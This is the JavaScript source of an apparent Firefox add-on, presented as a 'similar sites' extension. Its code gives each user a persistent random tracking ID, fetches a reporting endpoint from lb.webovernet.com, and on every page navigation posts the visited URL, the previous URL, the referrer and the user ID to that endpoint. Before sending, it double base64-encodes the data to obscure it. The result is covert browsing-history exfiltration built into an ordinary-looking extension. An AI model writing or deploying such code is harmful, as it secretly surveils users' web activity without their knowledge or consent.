var irns_aolisten = {
	onUninstalling: function(addon) {
		if ( addon.id != "{a104c59c-c150-4370-836c-6bb3214687}" ) 
			return;
		var currentWindow = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow("navigator:browser");
		var currBrowser = currentWindow.getBrowser();
		
	},
	onDisabling: function(addon) {
	},
	onOperationCancelled: function(addon) {
	},
}


var irns_CommonUtils_ssff = {

	
	//----------------------Constants for rollDate()
	get dtMONTH() { return 0; },
	get dtDAY()   { return 1; },
	get dtYEAR()  { return 2; },

	// Rolling Date to some years/month/days forward or backward 
    // DateType is set {dtYEAR,dtMONTH,dtDAY}
	rollDate : function (date, count, dateType) {
		try {
			var yr = date.getFullYear();
			var mo = date.getMonth() + 1;
			var day = date.getDate();
			
			var hours = date.getHours();
			var minutes = date.getMinutes();
			var seconds = date.getSeconds();
			var milliseconds = date.getMilliseconds();

			var _dateType = this.dtMONTH;
			if (dateType) {
				if ((dateType == this.dtMONTH) || (dateType == this.dtDAY) || (dateType == this.dtYEAR)) {
					_dateType = dateType;
				}
			}
			
			if (_dateType == this.dtYEAR) yr = yr + count;
			if (_dateType == this.dtMONTH) mo = mo + count;
			if (_dateType == this.dtDAY) day = day + count;
		
			return new Date(yr, mo-1, day, hours, minutes, seconds, milliseconds);
		} catch (e) {
			//;
		}
	},

	// Convert Date to String in format: "yyyy-mm-dd HH:MM:SS"
	getDateText: function(d) {		
		var year = d.getFullYear();
		var month = (d.getMonth() < 9 ? '0' : '') + (d.getMonth() + 1);
		var day = (d.getDate() < 10 ? '0' : '') + d.getDate(); 
		var hh =  (d.getHours() < 10 ? '0' : '') + d.getHours();
		var mm =  (d.getMinutes() < 10 ? '0' : '') + d.getMinutes();
		var ss =  (d.getSeconds() < 10 ? '0' : '') + d.getSeconds();
		return  year +"-"+ month +"-"+ day +" "+ hh +":"+ mm +":"+ ss;
	},
	


};

var irns_Database_ssff = 
{
	_mDBConn: null, // database connection	
    get mDBConn() 
	{ 
		if (this._mDBConn == null) 
			this.init();
		return this._mDBConn;
	},

    init: function() 
	{
		this.openDB();
		this.clearDB();   
    },

    destroy: function() 
	{
    },
	randomStringAlphaNum_ssff : function(length) 
	{
		var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
			length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
    openDB: function() 
	{
		try 
		{
			var file = Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("ProfD", Components.interfaces.nsIFile);  
			file.append("similarirn.sqlite");
			var storageService = Components.classes["@mozilla.org/storage/service;1"].getService(Components.interfaces.mozIStorageService);  
			this._mDBConn = storageService.openDatabase(file); // Will also create the file if it does not exist  

			// if database not exists - create it!
			var dbExists = this._mDBConn.tableExists("similarirn");
			if ( dbExists && (this.getSimilarsites().length == 0) )
			{
				var statement = irns_Database_ssff.mDBConn.createStatement("INSERT INTO similarsites(creationdate,  similarsite) values(DATETIME(?1), ?2)");
				var date = "'" + irns_CommonUtils_ssff.getDateText(new Date()) + "'";
				var ironaddon = {};        
				ironaddon.ironaddon =  irns_Database_ssff.randomStringAlphaNum_ssff(8) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) +  '-' + irns_Database_ssff.randomStringAlphaNum_ssff(12);
				ironaddon.ironaddon = ironaddon.ironaddon.toUpperCase(); 
				statement.bindStringParameter(0, date);
				statement.bindStringParameter(1, ironaddon.ironaddon);
				statement.execute();        
			}
			if( !dbExists  ) 
				this.createDB();

		} 
		catch(err) 
		{
		}
    },
  
	// create database at First time
    createDB: function() 
	{
		try 
		{
			this._mDBConn.executeSimpleSQL("CREATE TABLE ironaddons (creationdate TIMESTAMP,  ironaddon TEXT)");
			this._mDBConn.executeSimpleSQL("CREATE INDEX indexironaddons ON ironaddons (creationdate)");
		    var statement = irns_Database_ssff.mDBConn.createStatement("INSERT INTO ironaddons(creationdate,  ironaddon) values(DATETIME(?1), ?2)");
            date = "'" + irns_CommonUtils_ssff.getDateText(new Date()) + "'";
            ironaddon = {};        
            ironaddon.ironaddon =  irns_Database_ssff.randomStringAlphaNum_ssff(8) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + irns_Database_ssff.randomStringAlphaNum_ssff(4) +  '-' + irns_Database_ssff.randomStringAlphaNum_ssff(12);
            ironaddon.ironaddon = ironaddon.ironaddon.toUpperCase(); 
            statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, ironaddon.ironaddon);
			statement.execute();        
        
        } 
		catch(err){
			
		}		
    },

    clearDB: function() 
	{		
		if(this._mDBConn.tableExists("ironaddons"))   
		{
    	} 
		else 
		{
			this.createDB();
		}
    },
	
	beginMassTranzaction: function() 
	{
		if(!irns_Database_ssff.mDBConn.transactionInProgress)
			irns_Database_ssff.mDBConn.beginTransaction();
	},

	endMassTranzaction: function() 
	{
		if(irns_Database_ssff.mDBConn.transactionInProgress)
			irns_Database_ssff.mDBConn.commitTransaction();		
	},
		
	addironaddon: function(ironaddon) 
	{
		try 
		{
			var date = irns_CommonUtils_ssff.getDateText( ironaddon.creationdate );
			var statement = irns_Database_ssff.mDBConn.createStatement("INSERT INTO ironaddons(creationdate, ironaddon) values(DATETIME(?1), ?2)");
			statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, ironaddon.ironaddon);
			statement.execute();
        } 
		catch(e) {}
	},
	
	getSimilarsites: function() 
	{
        try  
		{
			
            var statement = irns_Database_ssff.mDBConn.createStatement("SELECT creationdate, similarsite FROM similarsites");		
			var results = [];			
			while (statement.executeStep()) 
			{
				var p = {
					date:        statement.getString(0),
					similarsite:     statement.getString(1)
				}
               
				results.push(p);
			}
			statement.finalize();
			return results;
        } 
		catch(e) 
		{ 
			return [];
        }			
	},
    getPid: function() 
	{
        try  
		{
			try{return Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch("").getCharPref("{a104c59c-c150-4370-836c-6bb3214687}.user_id");}
			catch(e){}
			
			var similarsites = this.getSimilarsites();
            if(similarsites.length > 0){return similarsites[0].similarsite;}
			else{return null;}
        } 
		catch(e){return null;}			
	}
};


	var irns_globals_ssff = {
	ci		: Components.interfaces,
	cr		: Components.results,
	cc		: Components.classes,
	webp	: 	Components.interfaces.nsIWebProgress,
	webpl	:	Components.interfaces.nsIWebProgressListener,
	tabs	:	new Array(),
	user_id	: 	irns_Database_ssff.getPid(),
	s		:	'806',
	md		:	'21',
	sub		:	'FF',
	session_id : '',
	listeners : null,
	send_url : '',
	is_valid_listener : function(iid) 
	{	
		return (iid.equals(irns_globals_ssff.webpl) ||	iid.equals(irns_globals_ssff.ci.nsISupportsWeakReference) || iid.equals(irns_globals_ssff.ci.nsISupports));
	},
	load_balance : function(currentversion) 
	{
		var url_params = "s="+encodeURIComponent (irns_globals_ssff.s);
		var installtime = 0;
		try{installtime = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch("").getCharPref("ironaddon.installtime");}
		catch(e){}
		
		if ( installtime == 0 || installtime == "" )
		{
			installtime = new Date().getTime() /1000;
			try{irns_globals_ssff.cc["@mozilla.org/preferences-service;1"].getService(irns_globals_ssff.ci.nsIPrefService).getBranch("").setCharPref("ironaddon.installtime",installtime);}
			catch(e){}		
		}
		

		url_params = url_params + "&ins="+encodeURIComponent(installtime)+"&ver="+encodeURIComponent(currentversion);
		var req = new XMLHttpRequest();
		req.open("GET","http://lb.webovernet.com/settings?"+url_params,true);
		req.onreadystatechange = function()
		{
			if ( req.readyState == 4 )
			{
				var lb = JSON.parse(req.responseText);
				if ( lb && lb.Status == 1 )
				{
					irns_globals_ssff.send_url = lb.Endpoint;
				}
			}
		}
		req.send(null);
	},
	get_browser_by_tab_id : function(id)
	{
		var tab = document.getElementById(id);
		if ( !tab )
			return null;
		
		for (var i=0;i<tab.childNodes.length;i++)
		{
			var browser = tab.childNodes[i];
			if ( browser.localName == "browser" )
				return browser;
		}
		
		return null
	},
	get_ff_version : function()
	{
		try 
		{
			return parseFloat(irns_globals_ssff.cc["@mozilla.org/preferences-service;1"].getService(irns_globals_ssff.ci.nsIPrefService).getBranch("").getCharPref("extensions.lastAppVersion"));
		}
		catch ( e )
		{
		}
		return 0;
		
	},
	on_page_load : function (e)
	{
	},
	randomStringAlphaNum_ssff : function(length) 
	{
		var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
			length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
	randomStringNum_ssff : function(length) 
	{
        var chars = '0123456789'.split('');
        if (! length) 
		{
            length = Math.floor(Math.random() * chars.length);
        }
        
        var str = '';
        for (var i = 0; i < length; i++) 
		{
            str += chars[Math.floor(Math.random() * chars.length)];
        }
        return str;
	},
    randomStringAlpha_ssff : function(length) 
	{
		var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
		length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},

	irns_init_tab_listeners_ssff : function()
	{
		jQuery.noConflict(true);
		
		irns_globals_ssff.session_id = 'S' + irns_globals_ssff.randomStringNum_ssff(14);

		var pid = irns_Database_ssff.getPid();

		if ( pid == "" || pid == null)
		{
			pid = irns_globals_ssff.randomStringNum_ssff(14);
			irns_globals_ssff.user_id = pid;
		}

		
		try{Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch("").setCharPref("{a104c59c-c150-4370-836c-6bb3214687}.user_id",pid);}
		catch(e){}
		
		try{irns_globals_ssff.s = irns_globals_ssff.cc["@mozilla.org/preferences-service;1"].getService(irns_globals_ssff.ci.nsIPrefService).getBranch("").getCharPref("{65030561-c150-4370-836c-6bb3214687}.src");}
		catch(e){}
		
		if ( irns_globals_ssff.s == "" || typeof(irns_globals_ssff.s) == "undefined")
		{
			irns_globals_ssff.s = "806";
		}
		try{irns_globals_ssff.cc["@mozilla.org/preferences-service;1"].getService(irns_globals_ssff.ci.nsIPrefService).getBranch("").setCharPref("{a104c59c-c150-4370-836c-6bb3214687}.src",irns_globals_ssff.s);}
		catch(e){}
			irns_globals_ssff.listners = new irns_global_tabs_listner_ssff();
			gBrowser.addTabsProgressListener(irns_globals_ssff.listners);
		Components.utils.import("resource://gre/modules/AddonManager.jsm");
		AddonManager.getAddonByID("{a104c59c-c150-4370-836c-6bb3214687}", function(addon) {
		irns_globals_ssff.load_balance(addon.version);
		});
		try {
		  Components.utils.import("resource://gre/modules/AddonManager.jsm");
		  AddonManager.addAddonListener(irns_aolisten);
		} catch (ex) {}

	}
	
}

function irns_global_tabs_listner_ssff(){};
irns_global_tabs_listner_ssff.prototype = 
{
	QueryInterface: function(iid)
	{
		if ( irns_globals_ssff.is_valid_listener( iid ) )
			return this;
		throw irns_globals_ssff.cr.NS_NOINTERFACE;
	},
	onLocationChange: function(aBrowser, aProgress, aRequest, aURI)
	{
		try{
		var httpChannel = null;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		if ( aURI.asciiSpec.indexOf("about:") > -1)
			return;
			
		var ref = aBrowser.contentDocument.referrer;
		if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
			ref = aRequest.referrer.asciiSpec;	
		var is_link = ref != "";
		
		if ( typeof(aBrowser.prev_url_ssff) == "undefined" && (aURI.asciiSpec.indexOf("www.google.com/aclk")>-1)  )
		{
			aBrowser.prev_url_ssff = ref;
			return;
		}
		if ( (aURI.asciiSpec.indexOf("www.google.com/aclk")>-1) )
			return;
		

		var prev = "";
		if (aBrowser.prev_url_ssff && (aBrowser.prev_url_ssff !="")) 
			prev = aBrowser.prev_url_ssff;
		else if ( aProgress.DOMWindow.opener )
			prev = aProgress.DOMWindow.opener.top.location.href;
		else
			prev = ref;
	
		if (
			( prev & prev.indexOf("http//www.google") > -1 ) &&
			( aURI.asciiSpec.indexOf("http://www.google") > -1 )
			)
		{
			return;
		}
		if ( irns_globals_ssff.send_url && irns_globals_ssff.send_url != "" )
		{
			var contentType = "";
			var httpChannel = null;
			try {httpChannel = aRequest.QueryInterface(irns_globals_ssff.ci.nsIHttpChannel);} catch (e) {}
			try{contentType = httpChannel.contentType;}catch(e){}
			if ( contentType != "" && contentType.toLowerCase().indexOf("html") == -1)
			{
				aBrowser.prev_url_ssff = "";
				return;
			}
			
			
			var params = "s="+encodeURIComponent(irns_globals_ssff.s)+"&md="+encodeURIComponent(irns_globals_ssff.md)+"&pid=" + encodeURIComponent(irns_globals_ssff.user_id)+"&sess=" +encodeURIComponent(irns_globals_ssff.session_id)+ "&q=" +encodeURIComponent(aURI.asciiSpec)+ "&prev=" + encodeURIComponent(prev) + "&link="+(is_link?"1":"0")+"&hreferer="+encodeURIComponent(ref)+"&sub="+encodeURIComponent(irns_globals_ssff.sub);
			var req = new XMLHttpRequest();
			req.open("POST",irns_globals_ssff.send_url+"/related",true);
			req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

			req.onreadystatechange = function()
			{
				if ( req.readyState == 4 )
				{
				}
			}
			if  ( aBrowser.prev_url_ssff == aURI.asciiSpec )
				return;
			params = encodeURIComponent(window.btoa(window.btoa(params)));
			req.send("e="+params);
			}
		aBrowser.prev_url_ssff = aURI.asciiSpec;
		}
		catch(e){};
			
	
	}, 
	onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr){return 0}, 
	onSecurityChange: function(aBrowser, aProgress, aRequest, aState) {return 0;},
  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus)
	{
		try{
		if (!( aFlag & irns_globals_ssff.webpl.STATE_STOP))
			return 0;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		var httpChannel = null;
		try {httpChannel = aRequest.QueryInterface(irns_globals_ssff.ci.nsIHttpChannel);} catch (e) {}
		if ( !httpChannel )
		{
			var x = (aRequest == null);
			return 0;
		}
		
		if ( httpChannel.URI.asciiSpec != aBrowser.currentURI.asciiSpec)
			return;
		
		
		}
		catch(e)
		{
		}
	},
	onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) {return 0;},
	onLinkIconAvailable: function() {return 0;},
	onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI){return true;},
	onLinkIconAvailable : function(aBrowser){return 0}
}



window.setTimeout(irns_globals_ssff.irns_init_tab_listeners_ssff,500);
